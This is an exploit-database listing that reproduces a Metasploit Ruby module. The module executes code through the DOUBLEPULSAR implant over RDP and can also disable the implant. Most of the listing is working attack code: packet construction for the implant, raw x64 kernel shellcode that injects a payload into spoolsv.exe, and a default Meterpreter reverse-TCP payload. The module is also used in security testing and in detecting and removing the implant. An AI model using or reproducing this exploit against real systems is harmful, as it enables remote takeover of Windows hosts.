RDP DOUBLEPULSAR Remote Code Execution Exploit

2020-02-04T00:00:00
ID 1337DAY-ID-33896
Type zdt
Reporter metasploit
Modified 2020-02-04T00:00:00

Description

This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for RDP. While this module primarily performs code execution against the implant, the "Neutralize implant" target allows you to disable the implant.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = GreatRanking

  include Msf::Exploit::Remote::RDP

  MAX_SHELLCODE_SIZE = 4096

  def initialize(info = {})
    super(update_info(info,
      'Name'               => 'RDP DOUBLEPULSAR Remote Code Execution',
      'Description'        => %q{
        This module executes a Metasploit payload against the Equation Group's
        DOUBLEPULSAR implant for RDP.

        While this module primarily performs code execution against the implant,
        the "Neutralize implant" target allows you to disable the implant.
      },
      'Author'             => [
        'Equation Group',  # DOUBLEPULSAR implant
        'Shadow Brokers',  # Equation Group dump
        'Luke Jennings',   # DOPU analysis and detection
        'wvu',             # RDP DOPU analysis and module
        'Tom Sellers',     # RDP DOPU analysis
        'Spencer McIntyre' # RDP DOPU analysis
      ],
      'References'         => [
        ['URL', 'https://github.com/countercept/doublepulsar-detection-script']
      ],
      'DisclosureDate'     => '2017-04-14', # Shadow Brokers leak
      'License'            => MSF_LICENSE,
      'Platform'           => 'win',
      'Arch'               => ARCH_X64,
      'Privileged'         => true,
      'Payload'            => {
        'Space'            => MAX_SHELLCODE_SIZE - kernel_shellcode_size,
        'DisableNops'      => true
      },
      'Targets'            => [
        ['Execute payload (x64)',
          'DefaultOptions' => {
            'EXITFUNC'     => 'thread',
            'PAYLOAD'      => 'windows/x64/meterpreter/reverse_tcp'
          }
        ],
        ['Neutralize implant',
          'DefaultOptions' => {
            'PAYLOAD'      => nil # XXX: "Unset" generic payload
          }
        ]
      ],
      'DefaultTarget'      => 0,
      'Notes'              => {
        'AKA'              => ['DOUBLEPULSAR'],
        'RelatedModules'   => ['exploit/windows/smb/smb_doublepulsar_rce'],
        'Stability'        => [CRASH_OS_DOWN],
        'Reliability'      => [REPEATABLE_SESSION]
      }
    ))

    register_advanced_options([
      OptBool.new('DefangedMode',  [true, 'Run in defanged mode', true]),
      OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])
    ])
  end

  OPCODES = {
    exec: 0x01,
    ping: 0x02,
    burn: 0x03
  }.freeze

  DOUBLEPULSAR_MAGIC = 0x19283744

  # https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/ns-wdm-_osversioninfoexw
  def parse_doublepulsar_ping(res)
    return unless res && res.length == 288

    magic,    _size,     major,   minor, build = res.unpack('V5')
    sp_major, _sp_minor, _suites, prod,  arch  = res[-8..-1].unpack('v3C2')

    return unless magic == DOUBLEPULSAR_MAGIC

    ver_str = "#{major}.#{minor}.#{build}"
    sp_str  = "SP#{sp_major}"

    prod_str =
      case prod
      when 1
        'Workstation'
      when 2
        'Domain Controller'
      when 3
        'Server'
      end

    arch_str =
      case arch
      when 1
        'x86'
      when 2
        'x64'
      end

    "Windows #{prod_str} #{ver_str} #{sp_str} #{arch_str}"
  end

  def setup
    super

    rdp_connect
    is_rdp, server_selected_protocol = rdp_check_protocol

    fail_with(Failure::BadConfig, 'Target port is not RDP') unless is_rdp

    case server_selected_protocol
    when RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX
      fail_with(Failure::BadConfig, 'DOUBLEPULSAR does not support NLA')
    when RDPConstants::PROTOCOL_SSL
      vprint_status('Swapping plain socket to SSL')
      swap_sock_plain_to_ssl
    end
  rescue Rex::ConnectionError, RdpCommunicationError => e
    fail_with(Failure::Disconnected, e.message)
  end

  def cleanup
    rdp_disconnect

    super
  end

  def check
    print_status('Sending ping to DOUBLEPULSAR')
    res = do_rdp_doublepulsar_pkt(OPCODES[:ping])

    unless (info = parse_doublepulsar_ping(res))
      print_error('DOUBLEPULSAR not detected or disabled')
      return CheckCode::Safe
    end

    print_warning('DOUBLEPULSAR RDP IMPLANT DETECTED!!!')
    print_good("Target is #{info}")
    CheckCode::Vulnerable
  end

  def exploit
    if datastore['DefangedMode']
      warning = <<~EOF


        Are you SURE you want to execute code against a nation-state implant?
        You MAY contaminate forensic evidence if there is an investigation.

        Disable the DefangedMode option if you have authorization to proceed.
      EOF

      fail_with(Failure::BadConfig, warning)
    end

    # No ForceExploit because check is accurate
    unless check == CheckCode::Vulnerable
      fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')
    end

    case target.name
    when 'Execute payload (x64)'
      print_status("Generating kernel shellcode with #{datastore['PAYLOAD']}")
      shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])
      shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)
      vprint_status("Total shellcode length: #{shellcode.length} bytes")

      print_status('Sending shellcode to DOUBLEPULSAR')
      res = do_rdp_doublepulsar_pkt(OPCODES[:exec], shellcode)
    when 'Neutralize implant'
      return neutralize_implant
    end

    if res
      fail_with(Failure::UnexpectedReply, 'Unexpected response from implant')
    end

    print_good('Payload execution successful')
  end

  def neutralize_implant
    print_status('Neutralizing DOUBLEPULSAR')
    res = do_rdp_doublepulsar_pkt(OPCODES[:burn])

    if res
      fail_with(Failure::UnexpectedReply, 'Unexpected response from implant')
    end

    print_good('Implant neutralization successful')
  end

  def do_rdp_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)
    rdp_send_recv(make_rdp_mcs_doublepulsar(opcode, body))
  rescue Errno::ECONNRESET, RdpCommunicationError
    nil
  end

=begin
  MULTIPOINT-COMMUNICATION-SERVICE T.125
      DomainMCSPDU: channelJoinConfirm (15)
          channelJoinConfirm
              result: rt-domain-not-hierarchical (2)
              initiator: 14120
              requested: 6402
=end
  def make_rdp_mcs_doublepulsar(opcode, body)
    data  = "\x3c" # channelJoinConfirm
    data << [DOUBLEPULSAR_MAGIC].pack('V')
    data << [opcode].pack('v')

    if body
      data << [body.length, body.length, 0].pack('V*')
      data << body
    end

    build_data_tpdu(data)
  end

  # ring3 = user mode encoded payload
  # proc_name = process to inject APC into
  def make_kernel_user_payload(ring3, proc_name)
    sc = make_kernel_shellcode(proc_name)

    sc << [ring3.length].pack('S<')
    sc << ring3

    sc
  end

  def generate_process_hash(process)
    # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm
    proc_hash = 0
    process << "\x00"

    process.each_byte do |c|
      proc_hash = ror(proc_hash, 13)
      proc_hash += c
    end

    [proc_hash].pack('l<')
  end

  def ror(dword, bits)
    (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF
  end

  def make_kernel_shellcode(proc_name)
    # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm
    # Length: 780 bytes
    "\x31\xc9\x41\xe2\x01\xc3\x56\x41\x57\x41\x56\x41\x55\x41\x54\x53" \
    "\x55\x48\x89\xe5\x66\x83\xe4\xf0\x48\x83\xec\x20\x4c\x8d\x35\xe3" \
    "\xff\xff\xff\x65\x4c\x8b\x3c\x25\x38\x00\x00\x00\x4d\x8b\x7f\x04" \
    "\x49\xc1\xef\x0c\x49\xc1\xe7\x0c\x49\x81\xef\x00\x10\x00\x00\x49" \
    "\x8b\x37\x66\x81\xfe\x4d\x5a\x75\xef\x41\xbb\x5c\x72\x11\x62\xe8" \
    "\x18\x02\x00\x00\x48\x89\xc6\x48\x81\xc6\x08\x03\x00\x00\x41\xbb" \
    "\x7a\xba\xa3\x30\xe8\x03\x02\x00\x00\x48\x89\xf1\x48\x39\xf0\x77" \
    "\x11\x48\x8d\x90\x00\x05\x00\x00\x48\x39\xf2\x72\x05\x48\x29\xc6" \
    "\xeb\x08\x48\x8b\x36\x48\x39\xce\x75\xe2\x49\x89\xf4\x31\xdb\x89" \
    "\xd9\x83\xc1\x04\x81\xf9\x00\x00\x01\x00\x0f\x8d\x66\x01\x00\x00" \
    "\x4c\x89\xf2\x89\xcb\x41\xbb\x66\x55\xa2\x4b\xe8\xbc\x01\x00\x00" \
    "\x85\xc0\x75\xdb\x49\x8b\x0e\x41\xbb\xa3\x6f\x72\x2d\xe8\xaa\x01" \
    "\x00\x00\x48\x89\xc6\xe8\x50\x01\x00\x00\x41\x81\xf9" +
    generate_process_hash(proc_name.upcase) +
    "\x75\xbc\x49\x8b\x1e\x4d\x8d\x6e\x10\x4c\x89\xea\x48\x89\xd9" \
    "\x41\xbb\xe5\x24\x11\xdc\xe8\x81\x01\x00\x00\x6a\x40\x68\x00\x10" \
    "\x00\x00\x4d\x8d\x4e\x08\x49\xc7\x01\x00\x10\x00\x00\x4d\x31\xc0" \
    "\x4c\x89\xf2\x31\xc9\x48\x89\x0a\x48\xf7\xd1\x41\xbb\x4b\xca\x0a" \
    "\xee\x48\x83\xec\x20\xe8\x52\x01\x00\x00\x85\xc0\x0f\x85\xc8\x00" \
    "\x00\x00\x49\x8b\x3e\x48\x8d\x35\xe9\x00\x00\x00\x31\xc9\x66\x03" \
    "\x0d\xd7\x01\x00\x00\x66\x81\xc1\xf9\x00\xf3\xa4\x48\x89\xde\x48" \
    "\x81\xc6\x08\x03\x00\x00\x48\x89\xf1\x48\x8b\x11\x4c\x29\xe2\x51" \
    "\x52\x48\x89\xd1\x48\x83\xec\x20\x41\xbb\x26\x40\x36\x9d\xe8\x09" \
    "\x01\x00\x00\x48\x83\xc4\x20\x5a\x59\x48\x85\xc0\x74\x18\x48\x8b" \
    "\x80\xc8\x02\x00\x00\x48\x85\xc0\x74\x0c\x48\x83\xc2\x4c\x8b\x02" \
    "\x0f\xba\xe0\x05\x72\x05\x48\x8b\x09\xeb\xbe\x48\x83\xea\x4c\x49" \
    "\x89\xd4\x31\xd2\x80\xc2\x90\x31\xc9\x41\xbb\x26\xac\x50\x91\xe8" \
    "\xc8\x00\x00\x00\x48\x89\xc1\x4c\x8d\x89\x80\x00\x00\x00\x41\xc6" \
    "\x01\xc3\x4c\x89\xe2\x49\x89\xc4\x4d\x31\xc0\x41\x50\x6a\x01\x49" \
    "\x8b\x06\x50\x41\x50\x48\x83\xec\x20\x41\xbb\xac\xce\x55\x4b\xe8" \
    "\x98\x00\x00\x00\x31\xd2\x52\x52\x41\x58\x41\x59\x4c\x89\xe1\x41" \
    "\xbb\x18\x38\x09\x9e\xe8\x82\x00\x00\x00\x4c\x89\xe9\x41\xbb\x22" \
    "\xb7\xb3\x7d\xe8\x74\x00\x00\x00\x48\x89\xd9\x41\xbb\x0d\xe2\x4d" \
    "\x85\xe8\x66\x00\x00\x00\x48\x89\xec\x5d\x5b\x41\x5c\x41\x5d\x41" \
    "\x5e\x41\x5f\x5e\xc3\xe9\xb5\x00\x00\x00\x4d\x31\xc9\x31\xc0\xac" \
    "\x41\xc1\xc9\x0d\x3c\x61\x7c\x02\x2c\x20\x41\x01\xc1\x38\xe0\x75" \
    "\xec\xc3\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52" \
    "\x20\x48\x8b\x12\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x45\x31\xc9" \
    "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1" \
    "\xe2\xee\x45\x39\xd9\x75\xda\x4c\x8b\x7a\x20\xc3\x4c\x89\xf8\x41" \
    "\x51\x41\x50\x52\x51\x56\x48\x89\xc2\x8b\x42\x3c\x48\x01\xd0\x8b" \
    "\x80\x88\x00\x00\x00\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20" \
    "\x49\x01\xd0\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\xe8\x78\xff" \
    "\xff\xff\x45\x39\xd9\x75\xec\x58\x44\x8b\x40\x24\x49\x01\xd0\x66" \
    "\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48" \
    "\x01\xd0\x5e\x59\x5a\x41\x58\x41\x59\x41\x5b\x41\x53\xff\xe0\x56" \
    "\x41\x57\x55\x48\x89\xe5\x48\x83\xec\x20\x41\xbb\xda\x16\xaf\x92" \
    "\xe8\x4d\xff\xff\xff\x31\xc9\x51\x51\x51\x51\x41\x59\x4c\x8d\x05" \
    "\x1a\x00\x00\x00\x5a\x48\x83\xec\x20\x41\xbb\x46\x45\x1b\x22\xe8" \
    "\x68\xff\xff\xff\x48\x89\xec\x5d\x41\x5f\x5e\xc3"
  end

  def kernel_shellcode_size
    make_kernel_shellcode('').length
  end

end

#  0day.today [2020-02-04]  #